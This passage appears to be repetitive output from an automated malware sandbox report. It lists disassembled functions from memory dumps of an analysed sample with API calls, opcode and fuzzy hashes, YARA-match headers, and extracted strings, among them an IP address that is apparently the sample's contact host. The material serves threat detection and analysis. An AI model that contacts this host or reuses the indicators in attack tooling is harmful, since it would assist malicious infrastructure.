                                                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: 185.156.72.65$185.156.72.65
                                                    • API String ID: 2296764815-2656946096
                                                    • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                                                    • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                                                    • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                                                    • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                                                    APIs
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    • __Init_thread_footer.LIBCMT ref: 004012A4
                                                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: 185.156.72.65$185.156.72.65
                                                    • API String ID: 2296764815-2656946096
                                                    • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                                                    • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                                                    • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                                                    • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                                                    APIs
                                                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                                                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                                                    • __Init_thread_footer.LIBCMT ref: 04958755
                                                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                                                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: G@ZK$[@G_
                                                    • API String ID: 4132704954-2338778587
                                                    • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                                                    • Instruction ID: b6d9e5f69eea9796bea2d87498c86624bd5840650b0f6347fdc5e806259f9cb9
                                                    • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                                                    • Instruction Fuzzy Hash: 4D01D6B0F00244DFDB10EFB8AC41969B7B0A759314BB00679D936AB2A0DB75B9058B45
                                                    APIs
                                                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                                                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                                                    • __Init_thread_footer.LIBCMT ref: 04958155
                                                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                                                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: G@ZK$[@G_
                                                    • API String ID: 4132704954-2338778587
                                                    • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                                                    • Instruction ID: 70e303a494107c807b5c4bbdc7990226a0e9e82326240ab6145931cc99123ab7
                                                    • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                                                    • Instruction Fuzzy Hash: 0001D6F1F41204DBE720EFA8AC41A69B7B0AB59314FB006B9E91957370DB3568458B45
                                                    APIs
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    • __Init_thread_footer.LIBCMT ref: 004084EE
                                                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: G@ZK$[@G_
                                                    • API String ID: 2296764815-2338778587
                                                    • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                                                    • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                                                    • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                                                    • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                                                    APIs
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    • __Init_thread_footer.LIBCMT ref: 00407EEE
                                                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: G@ZK$[@G_
                                                    • API String ID: 2296764815-2338778587
                                                    • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                                                    • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                                                    • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                                                    • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                                                    APIs
                                                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                                                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                                                    • __Init_thread_footer.LIBCMT ref: 04957B00
                                                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                                                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: @G@K$A@K.
                                                    • API String ID: 4132704954-2457859030
                                                    • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                                                    • Instruction ID: 38221bc8e8a54746fba994961db8364b5d67c5f54a5ce43662c162bd3be8d830
                                                    • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                                                    • Instruction Fuzzy Hash: 320181B0F00204DFD720DFA8E946A5C77B0E749304FB001BADD16A73A0D775AA458B59
                                                    APIs
                                                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                                                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                                                    • __Init_thread_footer.LIBCMT ref: 04957C10
                                                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                                                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: @G@K$ZYA.
                                                    • API String ID: 4132704954-4236202813
                                                    • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                                                    • Instruction ID: 1213575038c523a82ef544637b8d7b5647d95631f7cf84cebd34dcb3e32a8c94
                                                    • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                                                    • Instruction Fuzzy Hash: CF018174F00304DFDB24EFA8E991A5C7BF0AB44314FA041BADD2557360D6757945CB49
                                                    APIs
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    • __Init_thread_footer.LIBCMT ref: 00407899
                                                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: @G@K$A@K.
                                                    • API String ID: 2296764815-2457859030
                                                    • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                                                    • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                                                    • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                                                    • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                                                    APIs
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    • __Init_thread_footer.LIBCMT ref: 004079A9
                                                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: @G@K$ZYA.
                                                    • API String ID: 2296764815-4236202813
                                                    • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                                                    • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                                                    • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                                                    • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D